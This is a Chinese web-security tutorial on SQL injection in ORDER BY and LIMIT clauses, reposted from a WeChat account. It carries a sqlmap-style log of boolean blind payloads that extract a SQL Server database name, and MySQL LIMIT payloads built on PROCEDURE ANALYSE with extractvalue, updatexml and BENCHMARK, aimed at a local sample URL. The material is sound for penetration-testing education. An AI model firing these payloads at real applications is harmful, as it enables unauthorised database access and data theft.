2025-12-22 03:51:00 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文章详细介绍了SQL注入中orderby和limit两个特殊位置的注入技术与利用方法。文章首先解释了SQL语法顺序与执行顺序的区别，然后分别讲解了orderby注入的检测方法（布尔注入、延时注入等）和limit注入的利用方式（procedureanalyse等）。文章强调了掌握SQL语法对于有效利用这些注入点的重要性，并提供了具体的payload示例。这些特殊位置的注入在Java框架如mybatis中使用${}而非#{}时尤其常见，为安全测试人员提供了实用的技术参考。 综合评分： 91 文章分类： WEB安全,漏洞分析,渗透测试,漏洞POC

cover_image

SQL特殊位置注入：order注入和limit注入

绿洲安全

2025年12月20日 18:00 北京

以下文章来源于信安路漫漫，作者信安路漫漫

信安路漫漫 .

不积跬步，无以至千里；不积小流，无以成江河。作为一个安全工程师，该公众号主要分享在工作中需要的知识以及遇到的问题，希望大家点点关注。

前言

平常在做测试的过程中，我们经常遇到的sql注入点一般是在where语句后面，但是偶尔也会遇到注入点在order by和limit。这两个位置由于其有一些特殊性，导致一些注入方式不能使用。下面就一起来看看这两个位置如何去注入。

SQL语法基础知识

在具体看这两个位置以前，先来了解一下SQL的语法顺序以及执行顺序。

SQL语法顺序

平常书写SQL语句就是按照下面的语法顺序来书写的。

select[distinct]
from
join(如 left join)
on
where
group by
having
union
order by
limit

SQL的执行顺序

但是语法顺序并不是SQL的执行顺序，SQL在执行的过程中是按照下面的顺序来执行的。

(1)from
(2)on
(3)join
(4)where
(5)group by：group by 子句将数据划分为多个分组；
(6)sum,count,max,min,avg：聚合函数
(7)having：使用 having 子句筛选分组
(8)select：选择需要的列
(9)distinct（去重）：对结果进行去重操作
(9)union:将多个查询结合联合，会重复上面的步骤
(10)order by：对结果进行排序
(11)limit：返回的条数

以上每个步骤都会产生一个虚拟表，该虚拟表被用作下一个步骤的输入。这些虚拟表对调用者(客户端应用程序或者外部查询)不可用。只有最后一步生成的表才会会给调用者。如果没有在查询中指定某一个子句，将跳过相应的步骤。

检测sql注入的常用方式

1）布尔注入

2）报错注入

3）延时注入

4）多语句注入（堆叠注入,就是添加分号，在写一个语句）就是可以执行多个语句，利用分号进行隔开

5）联合注入（union)

6）内联注入

order by注入

是指注入点跟在order by语句的后面，我们最常遇到的注入点一般是跟在where后面的。但是现在跟在order by后面的情况越来越多，因为在JAVA中一般使用了框架mybaits，使用该框架在order by后面直接使用#{}会报错，有人为了省事，就会使用${}，大家也都知道前者是安全的，后者则会造成sql注入。

注入点

最简单的注入点如下

select * from goods order by $_GET[‘order’]

order by语法

SELECT column1, column2, ...
FROM table_name
ORDER BY column1, column2, ... ASC|DESC;

Order by 后面默认跟要查询的字段，也可以为多个字段

字段后面可以跟升序或者降序排序

ASC升序排序，默认为升序排序

DESC表示降序

order by后面的字段也可以用数字来代替，表示用第几个字段进行排序，这种方式经常用来判断表中有几个字段。

当数字超过了表的字段数会导致报错。

order by后面可以跟什么语句？

1）根据上面的sql执行顺序我们可以看到，order by的执行是在sql语句的最后面，因此order by后面不能直接跟union连接查询。这样在sql注入的时候就不能使用union注入了。

2）order by后面可以跟if(),case when else这样的复合查询语句。可以用来进行bool注入，延时注入等

3）order by后面可以接数字，字段名，这个可以用来判断是否存在注入以及字段数。

判断order by后面是否存在注入点

1）可以改变order by后的列名看排序是否改变来判断是在order by后面的注入点。然后加上ASC|DESC看结果排序是否有改变，有改变则证明有注入点

2）通过bool类型进行判断，下面两个页面如果返回结果不同，则证明有注入点

(select (case when (3013=3014) then '' else (select 1083 union select 9794)end))
(select (case when (3013=3013) then '' else (select 1083 union select 9794)end))

3）mysql可以使用延时判断,页面响应时间如果延时3秒，那么证明有注入。

sqlserver数据库延时使用的是waitfor delay ,但我在order by后的延时注入一直不成功

if(1=1,sleep(3),1)

4）如果返回报错，可以直接看报错信息是否存在注入点

order by后面的利用

利用方式其实跟其它注入位置相同，mysql可以通过bool类型注入和延时注入来读取数据，sqlserver数据库目前测试可以通过bool类型来读取数据。当然，如果有错误回显，可以使用报错注入。

可能用到的函数：length()、substr()、ascii()函数

如下面利用bool注入获取内容的payload。

[PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>64) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:26] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>96) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:26] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>112) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:26] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>104) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:27] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>108) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:27] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>110) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:27] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),4,1))>109) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:28] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>96) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:28] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>112) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:28] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>104) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:28] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>100) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:29] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>102) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:29] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),5,1))>101) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:29] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>96) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:29] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>112) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:30] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>120) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:30] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>116) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:30] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>118) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:31] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),6,1))>119) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:31] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),7,1))>96) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))[14:44:31] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))),7,1))>48) THEN '' ELSE (SELECT 5225 UNION SELECT 2408) END))

#

limit语句后的sql注入

limit语法

limit是在mysql中的语句，在sqlserver中无该字段，对应的为top。具体用法如下

LIMIT[位置偏移量,]行数

其中，中括号里面的参数是可选参数，位置偏移量是指MySQL查询分析器要从哪一行开始显示，索引值从0开始，即第一条记录位置偏移量是0，第二条记录的位置偏移量是1,依此类推...，第二个参数为“行数”即指示返回的记录条数。

SELECT [ALL | DISTINCT | DISTINCTROW ]   [HIGH_PRIORITY]   [STRAIGHT_JOIN]   [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]   [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position}   [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position}   [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options   | INTO DUMPFILE 'file_name'   | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]

从上面的内容中，可以得出下面的一些结论

1）limit前面没有order by时，后面可以跟union，如果存在order by，则不能使用union。

2）limit后面不能直接跟select语句和if语句。可以跟procedure语句，值得注意的是只有在5.0.0< MySQL <5.6.6版本才可以使用，procedure后面支持报错注入以及时间盲注

3）limit 关键字后面还可跟PROCEDURE和 INTO两个关键字，但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限，因此利用比较难。

limit注入点

如下的sql语句

select*from limittest limit 1,[可控点]

select ... limit [可控点]

利用方式

可以通过下面的语句进行利用。

# extractvalue 报错注入

http://127.0.0.1:8081/sql-limit.php?id=2,0 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);%23

# updatexml 报错注入

http://127.0.0.1:8081/sql-limit.php?id=2,0 procedure analyse(updatexml(1,concat(0x3a,user()),1),1);%23

# 对于无法报错注入的，可以结合来进行时间盲注

http://127.0.0.1:8081/sql-limit.php?id=2,0 procedure analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1);%23

PS：时间盲注这里不支持sleep，可以使用BENCHMARK
BENCHMARK主要用于测试多次进行某个操作所耗费的时间，这里用于做时间盲注的时间区别函数

procedure analyse(updatexml(rand(),concat(0x3a,benchmark(10000000,sha1(1)))),1)

总结

上面简单总结了一下sql注入中order by和limit两个位置如何利用，其实sql注入的利用的关键还是要熟练掌握sql的语法，这样在利用的时候才能事半功倍。

前面一段时间由于一些原因没有继续更新，后面会更新起来，大家一起来学习。这个公众号主要分享日常的学习过程，前面主要的文章是java安全方面的，后面还会分享关于内网安全，web安全，企业安全建设方面的知识。后面每周会在周一周三与大家相见。也希望大家能够点个关注支持一下，一起进步。

由于本人水平有限，文章中可能会出现一些错误，欢迎各位大佬指正，感激不尽。如果有什么好的想法也欢迎交流，谢谢大家了~~

参考链接

https://blog.csdn.net/promsing/article/details/112793260

https://bingslient.github.io/2019/10/31/SQLMAP%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5%E6%96%B9%E6%B3%95%E5%92%8C%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/#%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式详见页面底部说明板块。

本文转载自：绿洲安全《SQL特殊位置注入：order注入和limit注入》